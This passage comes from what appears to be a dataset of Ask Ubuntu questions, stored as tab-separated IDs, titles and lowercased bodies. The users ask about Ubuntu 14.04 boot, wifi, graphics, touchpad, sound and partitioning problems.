frozen or while it 's displaying the panic screen or some combination of all the above . most frequent glitch is as if the screen is broken into vertical bars spanning each an 8th of the screen , which are then rearranged . other 'shredding ' of the screen is frequent . ati radeon 200m always , compiz and xorg have been resource hogs , normally taking at least 20 % cpu each . i can boot from the recovery screen , but it still experiences crashes . can not do the full failproof mode , it hangs . will crash when booted from cd , leading me to believe it 's hardware . memtest crashed after 2 % pass two out of two times . the second time it was oscillating between looking normal and displaying random text shredded over the normal memtest screen . the flashing red plus continued to flash but everything else was frozen . once out of the fifty-some times it 's displayed a panic screen , it was complaining about the stuff it wrote to swap being corrupted , but that 's never happened again . i am at a total loss .
460384	( solved ) mouse not working in xubuntu	hi i am new to the linux world and i decided to install xubuntu 14.04 . to test xubuntu 14.04 , i booted with the xubuntu live cd into my desktop . i was pleasantly surprised to find it worked nicely , including the usb wireless adapter but after installed the mouse was not working and neither the wireless adapter . i have already reinstalled xubuntu and the problem still continue .
460386	brightness level saving problem	i am using ubuntu 14.04 and i want to save my brightness level , because every time when i start the computer the brightness level is maximum . thanks , kolyo ls -l /sys/class/backlight : total 0 lrwxrwxrwx 1 root root 0 mai 4 06:50 acpi_video0 - > ../../devices/pci0000:00/0000:00:02.0/backlight/acpi_video0 lrwxrwxrwx 1 root root 0 mai 4 06:50 intel_backlight - > ../../devices/pci0000:00/0000:00:02.0/drm/card0/card0-edp-1/intel_backlight
460387	how to change vertical vs horizontal mouse sensitivity ?	i have a logitech m570 wireless trackball that i have been using for the last year or so . within the last day , the sensitivity has changed . it seems to have suddenly changed from no scaling ( vertical=horizontal ) to scaling based on monitor dimensions ( in my case my monitor is 1366x768 so it ends u being 1.78 to 1 ) . i tried to follow the advice given here . but that did n't help any . what should i do ?
460388	ubuntu 14 upgrade fatal error	when i tried to upgrade to ubuntu 14 from 13 , i received a fatal error . it was opening and installing the files , but said gnome had a problem and something about a directory could n't be found or opened . the install froze , so i rebooted the machine . now all i get is the ubuntu screen , then it says i will be running in a lowered display until i reset it manually , then the screen says what do you want to do . i also have ubuntu 10 and 11 on disk , but when i reboot with them in the computer it reads them , but does nothing . i would like to keep all my settings and installed software if possible . any idea what i need to do to fix this ? thank you
460391	strange wifi issue ( incorrectly maxed-out signal strength ) , ubuntu 14.04 , macbook pro late 2013	ok , so currently i 'm having some issues with my wifi -- it sporatically stops working and reports my wifi strength is 100 % ( -3dbm+ , which is obviously incorrect ) . it worked just fine back in 13.10 . i actually had the same issue when 14.04 was in beta , and i had to go back to 13.10 to get rid of that issue . i 'm guessing it 's a driver fault , so i did all the work with b43-fwcutter , firmware-b43-installer and such . wicd did not help . i 'm using networkmanager . here are some maybe relavent diagnosic output , when the wifi works : # iwconfig wlan0 ieee 802.11abg essid : '' minwifi '' mode : managed frequency:2.422 ghz access point : a0 : f3 : c1:8b : d7:6a bit rate=104 mb/s tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on link quality=58/70 signal level=-52 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 $ lscpi -nn | grep 0280 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4331 802.11a/b/g/n [ 14e4:4331 ] ( rev 02 ) when the wifi does n't work : # iwconfig wlan0 ieee 802.11abg essid : '' minwifi '' mode : managed frequency:2.422 ghz access point : a0 : f3 : c1:8b : d7:6a bit rate=72 mb/s tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on link quality=70/70 signal level=16 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 strange .
460392	prevent redownload of packages for apt-get upgrade	say , i 've 100 packages marked to upgrade using apt-get upgrade , and while the upgrade is in progress , it was interrupted . now when i run the apt-get upgrade again , it 'll start downloading all packages from the beginning , even the ones it had finished downloading previously . is there any way to prevent the redownload ?
460393	connect to mobile broadband	i recently installed ubuntu 12.10 and connected to nokia 5233 with vodafone 2g simcard . i get the message `` connection established '' . but when i open firefox , i ca n't view any web page .
460394	dual boot windows 8 and ubuntu 12.04	i want to dual boot ubuntu with windows 8 . both are installed in my dell laptop but the bios is not configured properly . i have to press f11 every time i need to use ubuntu instead of windows 8 . i tried to use boot repair to repair it but was unsuccessful . here the the output from my boot repair : http : //paste.ubuntu.com/7390841/ also , the boot repair said that : the boot files of [ the os now in use - ubuntu 12.04.4 lts ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu.com/community/bootpartition ) what should i do in this situation ?
460395	ubuntu installer does not see windows 8 after changing partitions	i 'm pretty new to ubuntu ( and windows 8 for that matter ) . here is my story so far in case these details matter . i have a brand new windows 8 machine , and i wanted to dual boot ubuntu and windows 8 . i have a cd for ubuntu 12.04.4 32bit . i read that i needed to turn off secure boot and change my the setting in my bios form uefi to legacy . this allowed me to install ubuntu 12.04.4 32bit , and i did so using the normal install ( not making the partitions manually ) . ubuntu worked fine , but when i selected windows 8 from the startup menu i got a windows boot manager error saying something had changed and i need to repair the boot for windows . i switched back to uefi and windows booted fine , but of course , i get no ubuntu . since then i have come to learn my error was installing a 32bit version under legacy instead of a 64bit version under uefi . so i got the latest version of ubuntu ( 14.04 ) and put it on a bootable usb . i also read that it was best to do the partitioning under windows so it essentially understands what is happening . so i deleted the ubuntu partition , the swap partition , and the 1mb grub partition , all of which i assumed were put there by ubuntu . i then created two new unformatted partitions which will eventually be used for ubuntu and the swap partition . i assumed the installer could handle creating another grub partition ( maybe this is where my mistake is ) . so here is where my problem comes in : now i have swiched secure boot and uefi back on and booted from my usb with ubuntu 14.04 . when i get to the part where it asks me what type of install i want to do , it says no operating system found , and my only real option is to format and just run ubuntu . yet , when i take my usb out windows boots without any problem . so my question is , why is ubuntu not recognizing that windows 8 exists . i know the old version did in legacy mode , and i think the new one did also before i changed the partitions . did this happen because i deleted the grub partition ?
460397	installing ( creating ? ) driver for wireless adapter	i 'm very much a rookie with linux and recently installed ubuntu 12.04 . now i 'm trying to stall a wireless adapter , rt5370 , but the instructions are completely over my head ( plus certain steps like copying a file to etc/wireless are n't working because i get a permission denied error ) . is there a simple step-by-step guide on how to install a wireless adapter ? ? ?
460398	fujitsu lifebook ah552 touch pad sensitivity and side scrolling problem	last week i bought a fujitsu lifebook ah552 for just inr 29000/- it is the cheapest laptop available here ( kerala , india ) . with below configuration ; ram : 4gb processor : intel® core™ i3-3120m cpu @ 2.50ghz × 4 processor : intel® ivybridge mobile it comes without an operating system , so installed ubuntu 14.04 on their premises . all the hardware components are worked perfectly as it made for ubuntu , like brightness adjustment , wakeup from standby mode , sound , camera , microphone , bluetooth etc . but later i found that it had some issues with touchpad . mainly it sensitivity was too low and because of this scrolling ( both two finger and side scrolling ) double click taping was not working smooth . touch pad : alpsps/2 alps glidepoint after some research on the internet i found the solution and i am sharing my solution here for all of you have facing the same trouble .
460401	extra items in panel after installing xubuntu over ubuntu	i have installed ubuntu 14.04 on my thinkpad t60 and found out that unity is too slow . so , i did sudo apt-get install xubuntu-desktop when i log into an xubuntu session , the panel has a ton of junk from the unity interface ( a power menu with a non-working logout button , an extra language indicator that does not work , an extra clock ) . how can i get rid of them , ideally without breaking my ability to log into unity ? edit : i found other questions that ask about the same problems . they do not seem to have any useful answers : xubuntu strange behaviour panel-indicator and panel-notification applet xfce top panel indicator problem
460402	touchpad does not work on asus x450l	i resently installed ubuntu 14.04 on my asus x450l . it runs quite statisfactory , only the touchpad of the laptop does not function . is there any solution for this ? the bios setting is 'enabled'
460405	ipv6 does not work over bridge	i installed ubuntu 14.04 server a week ago . i use it as a virtual machine host ( tasksel installed ) . meaning am running it with kvm + libvirt . i have set up the same bridge i had in 13.10. auto p4p1 iface p4p1 inet manual up ifconfig $ iface up down ifconfig $ iface down auto br0 iface br0 inet static address 46.182.xxx.xxx netmask 255.255.255.240 gateway 46.182.xxx.xxx dns-nameservers 46.182.xxx.xxx 46.182.xxx.xxx bridge_ports p4p1 bridge_stp off bridge_maxwait 0 iface br0 inet6 auto against br0 i connect my virtual machines with < source bridge='br0'/ > defined in libvirt . my virtual machines get router advertisement messages without problem . all virtual machines get ipv6 addresses . my problem is that ipv6 does not work over the bridge . but it does work when i turn on tcpdump against br0 for troubleshooting . i have tried setting the interface manually into promiscous mode but that does not make it work , ifconfig br0 promisc . why i have the ipv4 addresses on the bridge ? i do not know , old habit , never question it . ipv6 does not work on the virtual machine host but the host get ipv6 address by ra , just like the virtual machines .
460407	why do i not see desktop cube option in compiz manager	ubuntu 14.04 on a new piece of hardware ( samsung laptop ) . i installed compizconfig settings manager . when i open compizconfig manager → desktop , i can see expo for instance but no cube . why is that ? any ideas ? it has a core i7 processor . it should have the built-in chops to handle high scale graphics .
460411	installing ubuntu 14.04 inside windows xp	i am trying to install ubuntu 14.04 alongside windows xp . downloaded iso from ubuntu site ( version for ram less than 2gb ) . burned to usb stick using lili usb creator . booted laptop using that pen drive . after selecting appropriate options laptop restarts . make changes to boot laptop from hard disk this time instead of from pen drive . a dialogue box appears and again options selected . it in turn starts downloading iso of ubuntu again , that same amd64 version although my laptop has an intel atom processor . somehow it got installed , but when it reboots multiple errors are shown and the ubuntu gui doesnât appear instead only the command line . some read only issues are shown and many errors . again rebooted system in windows xp and uninstalled ubuntu from add/remove programs . now , i need to know where am i going wrong , why is it downloading ubuntu again , and why is it downloading that amd version ? ~~~~~~~~ adding more info ~~~~~~~~ some screenshots ... . hope it clarifies some queries ... these screenshots are against no internet connection ... . and my system is 32 bit .
460412	super key gets 'stuck '	anytime i try to hit the super key , whether to bring up search or for a hot key , it gets stuck like it 's being held down . i have to tap it once more to unstick it . it 's not the keyboard i do n't think because it does n't happen in a non unity environment . any ideas ?
460413	how can i add a package to the default installation of ubuntu ?	i want to add the xclip package as default package in ubuntu . when i install linux then xclip package should also be installed with it . how can i do it ?
460414	i want reverse the encryption of my data .	when i first installed ubuntu , i chose for everything to be encrypted . now that i did it i regret it because every time i turn on my computer it asks for the password so it can boot and it gets annoying because it takes so much time . how do i make it so that i can just turn on my computer and have it go straight to the screen where i log into my account . by the way , i 'm running ubuntu 14.04 .
460420	any 3d drivers for ati fglrx which would support google earth and other 3d apps on chrome	i have installed many 3d apps on my ubuntu 14.04lts desktop but none of them are supportive i have asked many questions regardind this previously but no answer was available i think it is just due to non availability of additional 3d drivers in my pc its a humble requwst if any one could hrlp me in solving this problem currenly i am using ati radeon 3000 graphics with amd athlon 2 processor [ 3.4ghz ] i have used these 3d apps in the same computer but with windows 7 but now i have replaced windows 7 with ubuntu 14.04 lts 64-bit version i have biodigital human 3d which is a great app to explore human bidy in detail but i can not operate it in ubuntu is ubuntu really unsupportive to 3d graphics
460422	audio quality foobar2000 with wine	i have been a long time windows user and recently switched to ubuntu . i have a good 200gb of flac files that i used to listen to with foobar . foobar works really well using wine , but is there any loss of audio quality using the compatibility layer , or is it just as good as playing the files using a native linux application ?
460423	14.04 - can not click inside windows	i have asus k53sv , ubuntu 13.04 and 13.10 were working without problems . now i upgraded to 14.04 . upper panel works , so i can connect into wifi or shutdown machine . i can also launch application from left launch bar . but most applications are not responding to mouse clicks : folders : i can not open any folder . i see my home folder , but application is not responding to clicking . system preferences : the same as above , not responding to clicking . terminal : can type , but no response to clicking . in any application 'red x ' is not closing application , to shut it down i have to right-click on launch bar and select 'quit ' option . for a while of using system ( chrome is working normally , so it is not mouse problem ) i can not even launch application from launch bar . i tried to boot with older kernel ( from grub options ) but result is the same . any ideas how to fix it ? i can do some debug work if you tell me what to do . i would like to do not re-install whole system from scratch , i have installed and configured some applications ( eclipse , kile ) i and do not want to configure them again .
460424	can not install pipelight	i am running ubuntu 14.04 and keep running into trouble trying to install pipelight so i can watch netflix . what is going wrong ? here is the code i am using matt @ matt-hp-pavilion-dv6-notebook-pc : ~ $ sudo add-apt-repository ppa : pipelight/stable more info : https : //launchpad.net/~pipelight/+archive/stable press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmpwygd9m81/secring.gpg ' created gpg : keyring `/tmp/tmpwygd9m81/pubring.gpg ' created gpg : requesting key 25396b8e from hkp server keyserver.ubuntu.com gpg : /tmp/tmpwygd9m81/trustdb.gpg : trustdb created gpg : key 25396b8e : public key `` launchpad ppa for pipelight dev team '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok matt @ matt-hp-pavilion-dv6-notebook-pc : ~ $ sudo apt-get update e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ matt @ matt-hp-pavilion-dv6-notebook-pc : ~ $ sudo apt-get install -- install-recommends pipelight-multi reading package lists ... done building dependency tree reading state information ... done e : unable to locate package pipelight-multi
460425	boot problems ubuntu 14.04	my dmesg log is here . ( ~20s ) when i dmesg in terminal , the output is different ( ~818s ) . how do i troubleshoot this ?
460429	how to determine the total number of apps in the ubuntu software center	how do we determine the total number of apps in the ubuntu software center or even the total number of apps available for ubuntu anywhere ? not any specific reason , i just want to track if ubuntu 's app section is growing since somewhere i read that ubuntu has about 40000 apps as of 2013 in its software center .
460432	i need opengl update i have 1.1 ( very old )	i ca n't update my drivers because my drivers are updated and i use drivernavigator for installing new drivers . i installed all drivers and restarted the computer . and my drivers are still old . what can i do ? my pc : asus ( i ca n't write other ... ) sorry can you send me some link for installing opengl 1.1 plus ? thx .
460437	cinnamon imports to launchpad	i have made my own ppa with cinnamon latest commits imported to launchpad account https : //code.launchpad.net/~burhanilinux/burhanilinux/cinnamon but when i install , i get unmet dependencies error.so how should i rectify it ? should i change debian/control files ?
460440	volume buttons on dell inspiron n 5110 not working ( ubuntu studio 14.4 )	i just installed ubuntu studio 14.4 on a dell inspiron n 5110 , everything looks good , but the volume buttons wont work thus far .does anyone know how i can tweak this problem out of the world ? thanx ! kenneth
460441	step-by-step install on system with win 7 , but on different disk	i have ubuntu 14.04 on a bootable usb stick but decided against installing until i had decided i 'm entirely sure of what i want to do . i have three disks on my machine : 80g ( win 7 install ) 3000g ( storage / software ) 1000g ( old storage / software ) i want to format the latter one , and use for ubuntu os and software . but i 'm not sure of what to do during the install process . the first two options talk about either installing alongside win 7 on the same disk or removing it , so i have to go with the bottom option of doing a custom install . but how do i make sure i format it correctly etc ? i do n't want to screw up .
460446	wireless connection issues	i have a netgear wna3100 it has broadcom bcm43xx64 driver installed which is after trying several drivers the only one that would work . it will connect and work ( sometimes for 10 minute and other times for hours ) . when it works it works great , but the sometimes it will stop works , but the activity light shows it 's working , it is connected but nothing comes through . if i disconnect it wo n't reconnect , the only way to get it working after that is to restart the system . i know it 's not the network stuff because i can hook up to my wired network which is the same router and it works . any ideas on what is causing this issue ?
460447	can not use any applets in settings	settings launches as normal , however when i try to open any applet within settings the settings window freezes . i am able to move the settings window around the screen but i can not select any other applet within the settings window . if i try to close the settings window , after a few seconds i get a message telling me that : '' settings is not responding . '' i 'm invited to force quit or wait . waiting does not appear to help . trying to launch the applet by hitting the windows key and typing it by name just brings me to the settings window . idk how to launch one of these applets from the command line but can try if someone can advise .
460454	why does root take ownership of my files ?	i 'm new to linux and trying to install a library from github . i cloned https : //github.com/angrylawyer/rust-sdl2 in /home/username/documents/ and ran make as per instructions . now the entire rust-sdl2 folder is owned by root and i ca n't make any changes . why is this happening ? should i have put lib files into a particular folder ? how do i fix this ?
460457	`` bash : /usr/bin/mint-fortune : no such file or directory `` - ubuntu 14.04	previously i used lmde on my laptop , but now i moved to ubuntu . i might have been a little bit rough with it , because iâve simply format / partition , and installed ubuntu on it . home folder was separated , so i did n't touch it at all . now , when i start the terminal , i get this message : bash : /usr/bin/mint-fortune : no such file or directory i 've found a solution of this problem on linux mint forums : sudo pico /etc/bash.bashrc removing the line : /usr/bin/mint-fortune but i do n't have this line there . i imagine it has something to do with home folder , since i formatted everything else before installing .
460468	allow folder in all apparmor profiles ?	i want to put all my modified ubuntu server configurations files ( /etc/ ... ) in one folder via symbolic links . however , it 's annoying having to write the same line in all apparmor profiles . is there a way to allow this folder on all apparmor profiles ?
460469	laptop battery life increased in 14.04	i own a dell inspiron 15r laptop ( intel i5 @ 2.5ghz , 4gb ram , 750gb hdd 7200rpm , 15.6inch display , bluetooth , wifi , etc ) which is my primary machine for both work and personal use . i made a clean installation with 14.04 64-bit and i have noticed that my battery gain 1.5hour battery life ( total 3.5hours ) with this new ubuntu release compared with 12.04 64bit with the same use ! ! i really do n't have any problem with that , actually i am thrilled , but i wonder why this is happening ... note that i did not installed any extra packages such as laptop tools , tlp , etc just clean ubuntu 14.04 installation . any ideas why is this happening ... ? ? ?
460470	unable to install vmware player : module vpmc power on failed	i want to install ubuntu on my vmware player , but i facing the following error : virtualized performance counters are not supported on the host cpu type . module vpmc power on failed . failed to start the virtual machine` how can i solve this ?
460475	thinkpad t440s fan speed	i 've just installed ubuntu 14.04 on my new t440s , and it seems the fan starts working at full speed from time to time , i 've read in several places that this causes the fan to be noisy and generally not good for the computer/fan . i 've read many post and could n't decide the next action , should i control the fan speed , do i need to configure something related to computer 's temperature , or should i return to windows , and download lenovo power-management tool ?
460477	mouse lag after upgrading to ubuntu 14.04	i was running ubuntu 13.10 with no issues and decided to upgrade to ubuntu 14.04 recently . since i 've upgraded i 've noticed that my mouse starts to lag after i play a movie via xbmc or a video on youtube in full screen mode . it usually happens after playing a fullscreen video for around an hour . my mouse works perfectly on startup . i have just tried a fresh install of 14.04 and i 've got the same problem . when i say the mouse lags , i mean that after i move the mouse it takes 1-2 seconds to respond and is continuously lagging ie . once it starts lagging it 's constant and i have to reboot to fix the problem . i 've tried restarting x but that does n't fix it . i am using a logitech k400 mouse/keyboard combo with a logitech unified receiver . any suggestions ?
460481	ca n't login as admin or guest	i am relatively new to linux , and i installed a few applications via the command line yesterday . this morning , after boot up , i coulds't login anymore , neither as administrator nor as guest . when i try ctrlalt+1 , and try to login , it says : wrong username and password another thing is that on boot up , another error appears , but it passes by too fast to read . when i try to login on the graphical login screen ( both as admin or guest ) it shows 2 lines of code and returns to the graphical login screen . is it possible to fix this ?
460485	use kernel driver for intel graphics	i 'm trying to figure out how to force my gfx card to use i915 kernel driver . my card according to lspci is intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) . the reason i want this is because all videos play in slow motion . i asked around and was told to look at lspci -k output . it says vga is not using any kernel drivers . i booted my computer off livecd , looked at lspci -k output and saw the line kernel driver in use : i915 , so that is why i want to force it . lsmod on livecd lists i915 with a 4 next to it , whereas there is a 0 next to it on the installed system . i am on 14.04 at the moment , and this problem with the installation of 14.04 . please help me . $ lspci -k display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) subsystem : lenovo device 20e4 $ lsmod | grep i915 : i915 705396 0 i2c_algo_bit 13197 1 i915 drm_kms_helper 46907 1 i915 video 18903 1 i915 drm 243792 2 i915 drm_kms_helper these are on the installed system .
460487	switching to ubuntu from windows 8.1	i want to switch to ubuntu from windows 8.1 . i do not want to dual boot , just ubuntu ! i have two disks c - system and d- which has my files and pictures . i wonder if i can keep my d disc while installing ubuntu . if i can , how ?
460489	wireless not detected in 14.04 fresh install	i did a fresh install of 14.04 and now my wireless is not working . i do n't see it in the status bar . using unity desktop . 03:00.0 network controller [ 0280 ] : broadcom bcm43228 802.11a/b/g/n [ 14e4:4359 ] ] 0c:00.0 ethernt controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( received 07 ) i do n't have an wired connection for the laptop . writing from phone .
460490	pack ubuntu html5 click application for desktop	i would like to pack an ubuntu html5 click application for the ubuntu software center . the application is a game that uses apache cordova . it is already published in the click store , i would like to make it available in the ubuntu software center , too . ideally , it would be executed on the desktop as an ubuntu-html5-webapp application . thanks
460491	what 's the reason for tying some applications to gnome ?	i do n't want evolution , tracker and other packages in my computer ( ubuntu 14.04 , gnome 3.9 , shell 3.10.4 ) , but gnome depends on these packages . i 've read some tricks for disabling some of them without really removing their packages . despite this methods , i 'd like to know the reason for doing gnome this way . i do n't want to be fud'ish ( i 've been using linux for 10 years ) , but in windows there is `` turn windows features on or off '' . given the architectural superiority of linux in this sense , should n't it be easier to disable these packages ?
460499	monitor 's frequency and resolution set up	i have a samsung 710n monitor of 17 inch . its optimal resolution is 1280 x 1080 at 60 hz . i have ubuntu 12.04 lts on my laptop . i want to use only the samsung monitor as an external monitor and i want laptop 's screen be dark ( turned off ) . in displays application i chose mirror displays : unchecked . resolution : 1280 x 1080 . launcher placement : samsung . sticky edges : on . rotation : normal . questions : i ca n't find the frequency anywhere in displays . how can i be sure that ubuntu chose 60 hz , the correct frequency for my monitor ? ( my laptop supports the optimal resolution and 60 hz frequency of the monitor ) . is it correct what i chose in displays ? i do n't know what mirror displays , launcher placement , sticky edges and rotation are for . thanks
460501	wallpaper resets to gnome default	recently i wanted to try gnome shell and installed it . fiddled around a little bit and then decided to uninstall it . now every time i restart wallpaper resets to the default gnome wallpaper which is the blue abstract ( changes throughout the day ) image . it does not happen when i log out and log back in . and i do n't need to manually change the wallpaper to the one i previously set before restarting . when i open wallpaper settings it automatically changes my last set wallpaper . or when i untick and tick `` show desktop icons '' in dconf editor . should i just live with this or is there any way to fix it ?
460502	14.04 unity - using “files” the icons and text become faint or not visible	displayed screen content is unstable . some icons and lines correctly displayed may become not visible in a totally random manner . or a whole page might appear empty/faint , while actually they have a content . the problem appears ( only ? ) when using “files” at the launch bar . i guess that is the name for nautilus file browser in unity . opening folders , the contents ( icons and text ) might be dislayed fully on the whole screen ( or not at all ) in the first seconds . but anything present on display may become faint or totally invisible very soon later . they vanish mostly when mouse is moved vertically over , while the rest of the displayed lines remain visible until mouse is moved over . coming back to the same spot , the content might become visible again , e.g . by right click ; or some action might trigger renewing the page correct display again . ( e.g . click on list icon ) windows xp has no such problems on same machine . the drivers for the old nvidia videocard in ubuntu might not be adequate , but i doubt it , because linux internet browsers show all webpages as normal . thank you for assitance .
460503	launch diablo 2 lord of destruction with wine from cd	i installed diablo ii lord of destruction with wine on my ubuntu 13.10 . i mounted .iso file . i opened `` drives '' settings in `` configure wine '' and changed mounted disc to drive d : . ( in my case /media/milkovsky/diablo ii lod ) . whed i try to launch diabloii.exe i alvays get popup message please verify that your diablo 2 expansion disc is in your cd-om drive , than click 'retry ' . p.s . you may think this question could be duplicate of how to install diablo 2 lord of destruction ? but i did n't find a solution for me there . i tried all the anserws
460504	edit file after no startup - lubuntu 14.04	i have made some editing in a file and now lubuntu just shows the logo and the five dot ! i pressed alt f2 and now i 'm `` in '' somewhere , i beleave it must be the `` terminal '' - i 'm relatively new ti linux , so bare with me . i can locate the file : /usr/share/lightdm/lightdm.conf.d/60-lightdm-gtk-greeter.conf i edited what i thought was a spelling error - i thought [ seatdefaults ] should be [ setdefaults ] and i added tis line : greeter-setup-script=/usr/bin/numlockx on and now the computer will not re-boot correctly . how can i edit the file from where i am right now ? ( alt f2 after failed boot )
460506	second user can not write to nfs share	i have two machines : machine 1 = ubuntu 14.04 server machine 2 = ubuntu 14.04 x64 desktop i have two nfs shares in machine 1 which are accessed through machine 2 by the primary user with no problems , but i have just set up a new user and can not copy files to the share , even though that second user can create folders on the share . the error says : error opening file : '/path to server/file name ' . operation not permitted . the new user is in the same primary group as the main user , and the permissions all seem correct . the fstab entry for the drives in the server is as follows : uuid=2feae88e665eda39 /media/media ntfs-3g fmask=000 , dmask=000 , uid=1000 , gid=1000 0 0 here is the fstab line for automounting the nfs share in machine 2 : # automount glados media 192.168.1.30 : /media/media /mnt/nfs/glados-media nfs rsize=8192 , wsize=8192 , timeo=14 , intr , nfsvers=3 the /etc/exports file on machine 1 is set up as follows : /media/media 192.168.1.0/24 ( rw , sync , no_root_squash , crossmnt ) all of this seems to be set fine , but i still can not copy files onto the shared drive as the second user . i have tried changing the gid on machine 1 to 100 ( users ) but this made no difference . also , checking the permissions on the files and folders on the share confirms full rwx access to all users and groups : drwxrwxrwx 1 sk sk 4096 may 3 15:14 media i have not been able to find any posts to match this either . thanks for any help you may have .
460507	trouble starting up trusty tahr	i have just installed the ubuntu 14.04 lts obtained from the link on the page `` http : //www.ubuntu.com/download/desktop '' after i login giving my password i expect to see the initial desktop , but instead the dialog box disappears from the screen and the system seems to be in some infinite loop . i do not know how to proceed further .
460508	no sound in ubuntu 14.04	i 'm getting no sound on a fresh install of ubuntu gnome 14.04 . result of running alsa-info is here . i tried purge/reinstall of pulseaudio and alsa-base and removing .config/pulse and .pulse-cookie . using headphones did not work either . what else can i try to fix this ? sound works fine in windows , so not a hardware issue .
460509	how to enable monitor mode on bcm 43142 with wl driver	first things first : i 've checked and i do n't believe this is a duplicate . when i enter this command to enable monitor mode on prism0 : echo 1 | sudo tee /proc/brcm_monitor0 i get an input/output error . i ca n't even edit the file manually . is there any way to enable monitor mode ?
460512	what framework should i use in my manifest file	i 'm writing an application for ubuntu for phones and need to know what framework goes in the manifest.json file . i submitted an app but got this back : - 'ubuntu-sdk-13.10 ' is obsolete . please use a newer framework what are the supported frameworks ?
460514	how to run a program automatically in ubuntu ?	how can i run a program in the terminal automatically in ubuntu ? how to make a shell script to print the output into a text file ?
460515	in which file directory are the desktop background wallpapers kept ?	i 'm just here to ask which file directory i can find my desktop background wallpapers in 14.04 so i can copy them onto a usb and take them over to my windows 8 pc so i can use them there .
460517	mouse & keyboard stuck after logging in	mouse & keyboard got stuck after logging in to ubuntu 14.04 . tried many solutions , none worked out . any solutions ?
460519	problem whith my phone and my ubuntu pc	i have ubuntu on my pc and also i have an alcatel ot 908 . my usb port on my phone is broken ( ! ! ! ) . when i had ms.windows i used to use a program named android manager , but it used wifi . now that i have ubuntu i can not use it , because of the worldwide known problem : on some devices ubuntu has problem with the wifi devices . so please help me . also , i am a greek user of ubuntu , so sorry for my bad english . : - )
460522	how to repair fonts for perl/tk ( 14.04 )	with ubuntu 14 . 04 i have perl 5.18.2 for x86_64-linux-gnu-thread-multi on my laptop which is nice , but after installing perl/tk-804.032 from cpan i seem to only get non-antialiased fonts ( scaled bitmaps ? ) when i start perl/tk scripts that looked ok on ubuntu 12.04 : any suggestions how to repair the fonts or to investigate the problem are appreciated .
460525	ubuntu 12.04 date incorrect on boot	i succumbed and did the update thing to 12.04 on a desktop . i have just about beaten it into submission but have one puzzle still to solve . i have done much searching on the 'net but seems no one has the answer . on boot up the date sticks at the last date the system was running which may be a day or two or more ago . a restart sets the date to the current day . or set it via terminal . might be permissions , might be boot sequence , might be many things . anyone know what files are responsible for the date part . there is a lot of files too trawl through looking for a possible conflict and i only have finite time on the planet ? or is there a known answer ?
460526	minimal bash ( grub ) after running boot-repair	i was last running ubuntu 12.04 dual-boot with windows xp before this problem happend : when i boot my computer , after the bios screen i get the command prompt of grub v1.99 . i am unable to get to the normal ubuntu os . i 've done these operations ( chronologically ) : had operational ubuntu 12.04 dual-boot with win xp and all was well . installed a new nvidia graphics card . had trouble with it . installed ubuntu 14.04 instead of the 12.04 , and then installed 12.04 again ( a couple of times ) . had trouble with boot - sometimes i had `` hd0 out of disk '' , other times some grub error , and other times ubuntu 12.04 loaded successfully and worked ok . ran boot-repair thinking it would help the non-deterministic boot . current state : when i boot i get a `` minimal bash ( grub ) '' command prompt in which i can type . this is the output of boot info script run using the ubuntu 12.04 livecd : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos7 ) /boot/grub on this drive . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows xp : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows xp boot files : /boot.ini /ntldr /ntdetect.com sda2 : __________________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sda5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sda6 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sda7 : __________________________________________________________________________ file system : ext4 boot sector type : grub2 ( v1.99 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of sda7 and looks at sector 457366776 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos7 ) /boot/grub on this drive . operating system : ubuntu 12.04.4 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 63 426,975,231 426,975,169 7 ntfs / exfat / hpfs /dev/sda2 426,977,278 488,396,799 61,419,522 5 extended /dev/sda5 480,030,720 488,396,799 8,366,080 82 linux swap / solaris /dev/sda6 426,977,280 447,561,727 20,584,448 83 linux /dev/sda7 447,563,776 480,022,527 32,458,752 83 linux '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 10989cd3989cb8a4 ntfs /dev/sda5 17554fb8-462b-4666-84b2-dba91401d9cc swap /dev/sda6 79f985ef-54a9-4cdd-a6ae-5e777e405377 ext4 storage /dev/sda7 7cfe4896-1943-4625-b1c3-2c17aa6b1b47 ext4 /dev/sr0 iso9660 ubuntu 12.04.3 lts amd64 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) ================================ sda1/boot.ini : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 